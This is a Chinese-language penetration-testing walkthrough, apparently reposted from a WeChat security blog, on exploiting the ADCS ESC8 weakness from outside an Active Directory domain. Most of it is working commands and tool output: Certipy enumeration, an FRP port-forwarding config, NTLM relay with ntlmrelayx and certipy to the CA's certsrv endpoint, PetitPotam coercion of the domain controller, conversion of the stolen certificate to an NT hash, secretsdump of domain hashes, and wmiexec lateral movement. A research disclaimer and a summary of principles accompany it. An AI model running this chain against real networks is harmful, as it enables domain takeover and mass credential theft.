源帖子https://blog.897010.xyz/post/25
一台能访问域的电脑 (本次演示纯粹的域外)
一个域账号
https://blog.897010.xyz/post/25
0x00
背景
一台能访问域的电脑 (本次演示纯粹的域外)一个域账号要求:打穿此域
漏洞检测
查询是否存在相关ESC漏洞,获取CA主机名和CA域名
certipy-ad find -u [email protected] -p hacker@123456 -dc-ip 172.x.x.1 -vulnerable -stdoutCertipy v4.8.2-by Oliver Lyak (ly4k)[*] Finding certificate templates[*] Found 33 certificate templates[*] Finding certificate authorities[*] Found 2 certificate authorities[*] Found 22 enabled certificate templates[*] Trying toget CA configuration for'HACKER-CASERVER-CA' via CSRA[!] Got error while trying toget CA configuration for'HACKER-CASERVER-CA' via CSRA: CASessionError: code: 0x80070005- E_ACCESSDENIED - General access denied error.[*] Trying toget CA configuration for'HACKER-CASERVER-CA' via RRP[*] Got CA configuration for'HACKER-CASERVER-CA'[!] Failed to resolve: adrms01.HACKER.0day.com[*] Trying toget CA configuration for'HACKER-ADRMS01-CA' via CSRA[!] Got error while trying toget CA configuration for'HACKER-ADRMS01-CA' via CSRA: [Errno -2] Name or service not known[*] Trying toget CA configuration for'HACKER-ADRMS01-CA' via RRP[!] Got error while trying toget CA configuration for'HACKER-ADRMS01-CA' via RRP: [Errno Connection error (adrms01.HACKER.0day.com:445)] [Errno -2] Name or service not known[!] Failed toget CA configuration for'HACKER-ADRMS01-CA'[!] Failed to resolve: adrms01.HACKER.0day.com[!] Got error while trying tocheckfor web enrollment: [Errno -2] Name or service not known[*] Enumeration output:Certificate Authorities0CA Name : HACKER-CASERVER-CADNS Name : CASERVER.HACKER.0day.comCertificate Subject : CN=HACKER-CASERVER-CA, DC=HACKER, DC=JHHHHHHHHHHHHHHHHHHHHHHHsemi, DC=comCertificate Serial Number : 1C8C8BE4766A07AB4D408E10A583C9AACertificate Validity Start : 2022-06-2305:48:39+00:00Certificate Validity End : 2121-06-2305:58:38+00:00Web Enrollment : EnabledUser Specified SAN : DisabledRequest Disposition : IssueEnforce Encryption for Requests : EnabledPermissionsOwner : HACKER.0day.comAdministratorsAccess RightsManageCertificates : HACKER.0day.comAdministratorsHACKER.0day.comDomain AdminsHACKER.0day.comEnterprise AdminsManageCa : HACKER.0day.comAdministratorsHACKER.0day.comDomain AdminsHACKER.0day.comEnterprise AdminsEnroll : HACKER.0day.comAuthenticated Users[!] VulnerabilitiesESC8 : Web Enrollment is enabled and Request Disposition issetto Issue1CA Name : HACKER-ADRMS01-CADNS Name : adrms01.HACKER.0day.comCertificate Subject : CN=HACKER-ADRMS01-CA, DC=HACKER, DC=0day, DC=comCertificate Serial Number : 17FAD204DF8B19BE4C58B64A8B0B7755Certificate Validity Start : 2022-02-1609:32:37+00:00Certificate Validity End : 2121-02-1609:42:37+00:00Web Enrollment : DisabledUser Specified SAN : UnknownRequest Disposition : UnknownEnforce Encryption for Requests : UnknownCertificate Templates : [!] Could not find any certificate templates
出现ESC8漏洞特征
ESC8 : Web Enrollment is enabled and Request Disposition is set to Issue
通过Ping CA域名的方式获取CA服务器的实际IP或利用AdExplorer进行查找DNS记录
CA主机名: HACKER-ADRMS01-CACA域名: CASERVER.HACKER.0day.comCA hostname :172.x.x.10DNS: HACKER.0day.com
访问 http://CA证书服务器IP/certsrv/
ADCS ESC- 域外
由于本机杀毒原因,Impacket包无法留存,Ntml中继只能在虚拟机Kali中进行,使用FRP代理出来
需要强调的是windows一般默认开启SMB会占用445端口,需要提前关闭SMB服务
serverAddr = "172.x.x.195"serverPort = 7000[[proxies]]name = "test-tcp"type = "tcp"localIP = "127.0.0.1"localPort = 445remotePort = 445[[proxies]]name = "tesxx"type = "tcp"localIP = "127.0.0.1"localPort = 80remotePort = 80[[proxies]]name = "x"type = "tcp"localIP = "127.0.0.1"localPort = 9389remotePort = 9389[[proxies]]name = "xs"type = "tcp"localIP = "127.0.0.1"localPort = 6666remotePort = 6666
确保frp代理端口正常通信,可以使用python -m http.sever 445/80 分别验证代理出445和80端口后,使用ntlmrelayx / certipy-ad进行中继
0x01
中继NTLM
ntlmrelayx:impacket-ntlmrelayx --target http://172.x.x.10/certsrv/certfnsh.asp -smb2support --adcs -debug --template DomainControllerimpacket-ntlmrelayx --target http://CA服务器地址/certsrv/certfnsh.asp -smb2support --adcs -debug --template DomainControllercertipy-ad:certipy-ad relay -target 172.x.x.10 -template DomainControllercertipy-ad relay -target CA服务器地址 -template 证书格式,默认就行
强制域控访问我们的中继服务器,方法很多,这边使用PetitPotam实现
python3 PetitPotam.py -u 'meetingroom' -p 'hacker@123456' -d 'hacker.0day.com'172.x.x.195172.x.x.1python3 PetitPotam.py -u ' -p '' -d '' 监听的中继IP 域控IP #域控win16以下时支持匿名访问
攻击成功,查看中继监听的回显,获取到pfx格式证书
1.Certipy
成功获取的情况下,将直接保存为pfx证书文件
2.impacket
impacket=0.12.0
成功获取的情况下,将直接保存为pfx证书文件1
impacket=0.10.0
成功获取的情况下,将以base64格式输出到终端
Impacket v0.10.0- Copyright 2022 SecureAuth Corporation[*] Protocol Client SMB loaded..[*] Protocol Client SMTP loaded..[*] Protocol Client IMAP loaded..[*] Protocol Client IMAPS loaded..[*] Protocol Client HTTPS loaded..[*] Protocol Client HTTP loaded..[*] Protocol Client MSSQL loaded..[*] Protocol Client DCSYNC loaded..[*] Protocol Client LDAPS loaded..[*] Protocol Client LDAP loaded..[*] Protocol Client RPC loaded..[*] Runningin relay mode to single host[*] Setting up SMB Server[*] Setting up HTTP Server on port 80[*] Setting up WCF Server[*] Setting up RAW Server on port 6666[*] Servers started, waiting for connections[*] SMBD-Thread-5 (process_request_thread): Received connection from127.0.0.1, attacking target http://172.x.x.10[*] HTTP server returned error code 200, treating as a successful login[*] Authenticating against http://172.x.x.10as HACKER/DC03$ SUCCEED[*] SMBD-Thread-7 (process_request_thread): Connection from127.0.0.1 controlled, but there areno more targets left![*] SMBD-Thread-8 (process_request_thread): Connection from127.0.0.1 controlled, but there areno more targets left![*] SMBD-Thread-9 (process_request_thread): Connection from127.0.0.1 controlled, but there areno more targets left![*] SMBD-Thread-10 (process_request_thread): Connection from127.0.0.1 controlled, but there areno more targets left![*] SMBD-Thread-11 (process_request_thread): Connection from127.0.0.1 controlled, but there areno more targets left![*] SMBD-Thread-12 (process_request_thread): Connection from127.0.0.1 controlled, but there areno more targets left![*] SMBD-Thread-13 (process_request_thread): Connection from127.0.0.1 controlled, but there areno more targets left![*] SMBD-Thread-14 (process_request_thread): Connection from127.0.0.1 controlled, but there areno more targets left![*] SMBD-Thread-15 (process_request_thread): Connection from127.0.0.1 controlled, but there areno more targets left![*] SMBD-Thread-16 (process_request_thread): Connection from127.0.0.1 controlled, but there areno more targets left![*] SMBD-Thread-17 (process_request_thread): Connection from127.0.0.1 controlled, but there areno more targets left![*] SMBD-Thread-18 (process_request_thread): Connection from127.0.0.1 controlled, but there areno more targets left![*] SMBD-Thread-19 (process_request_thread): Connection from127.0.0.1 controlled, but there areno more targets left![*] SMBD-Thread-20 (process_request_thread): Connection from127.0.0.1 controlled, but there areno more targets left![*] SMBD-Thread-21 (process_request_thread): Connection from127.0.0.1 controlled, but there areno more targets left![*] Generating CSR...[*] CSR generated![*] Getting certificate...[*] GOT CERTIFICATE! ID 146[*] Base64 certificate ofuser DC03$:MIISBQIBAzCCEb8GCSqGSIb3DQ..............
0x02
利用Certipy-ad进行解密pfx格式文件,获取到域管Hash值
certipy-ad auth -pfx DC03$.pfx -dc-ip 172.x.x.1 -debugCertipy v4.8.2 - by Oliver Lyak (ly4k)[*] Using principal: dc03$@hacker.0day.com[*] Trying to get TGT...[*] Got TGT[*] Saved credential cache to 'dc03.ccache'[*] Trying to retrieve NT hashfor'dc03$'[*] Got hashfor'[email protected]': aad3b435b51404eeaad3b435b51404ee:3xxxxxxxxxxxxxxxxxxxx1
使用impacket包中的secretsdump.py导出域用户hash
python secretsdump.py -hashes :39xxxxxxxxxxx611 hacker.0day.com/dc03$@172.x.x.1
也可以使用下面命令导出指定用户的hash,防止操作过于敏感
secretsdump.py -hashes :3xxxxxxxxxxxxxxxxxxxx1 -dc-ip 172.x.x.1" hacker.0day.com/[email protected]" -just-dc-user "域用户名" -debug使用wmiexec.py进行命令执行,需要注意的是这里使用的dc03$用户的hash无法使用wmi命令执行
使用账号didiao的hash值进行命令执行
获取域控操作权限
通过ADExplorer64.exe(微软官方的域控制器工具)利用ldap查询相关DNS记录得到特定用户的机器IP地址,再配合hashes使用wmiexec等组件进行指定横向。
DomainDnsZones-->MicrosoftDNS-->域名--->指定用户
dnsRecord的值中最后位置既为该用户的机器IP地址。如图
0x03
总结
相关原理总结,从个人理解的角度上来说,ADCS是基于http这种未加密协议和NTLM的认证机制,导致恶意用户偷取域管NTLM。而整个域渗透的大部分漏洞都是围绕在两种认证方式上面。
必要条件:域管存在强制认证漏洞CA服务器可以注册并采用HTTP协议
复盘一下整个流程1.漏洞检测:使用Certipy工具检测域内是否存在ESC8漏洞,获取CA主机名和域名。检测结果显示存在两个证书颁发机构(CA),其中一个名为HACKER-CASERVER-CA的CA存在ESC8漏洞,表现为WebEnrollment启用且RequestDisposition设置为Issue。2.获取CA信息:通过Ping CA域名或使用AdExplorer工具查找DNS记录来获取CA服务器的实际IP地址。文档中提到的CA主机名为HACKER-ADRMS01-CA,域名为CASERVER.HACKER.0day.com,实际IP为172.x.x.10。设置代理和中继:由于杀毒软件的干扰,Impacket包无法留存,因此使用FRP代理将NTLM中继从虚拟机Kali中代理出来。需要关闭SMB服务以避免端口冲突,并设置FRP代理端口以确保正常通信。3.中继NTLM:使用ntlmrelayx和certipy-ad工具进行NTLM中继攻击,目标是HACKER-CASERVER-CA的CA服务器。通过PetitPotam工具强制域控制器访问中继服务器,成功获取pfx格式的证书。4.后续利用:使用Certipy-ad工具解密pfx文件,获取域管理员的NTLM哈希值。使用impacket包中的secretsdump.py工具导出域用户哈希值。使用wmiexec.py工具进行命令执行,获取域控制器操作权限。5.总结:ADCS基于HTTP协议和NTLM认证机制,存在强制认证漏洞,允许恶意用户窃取域管理员的NTLM哈希。域渗透的大部分漏洞都围绕这两种认证方式。攻击成功的条件包括域管理员存在强制认证漏洞和CA服务器可以通过HTTP协议注册。
写在最后
在这期间遇到的各种问题踩过的坑也不在少数,好在都一一解决还是那句话凡事发生,皆有利于我---Hne
原文始发于微信公众号(安全的黑魔法):ADCS ESC-8 域外利用
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论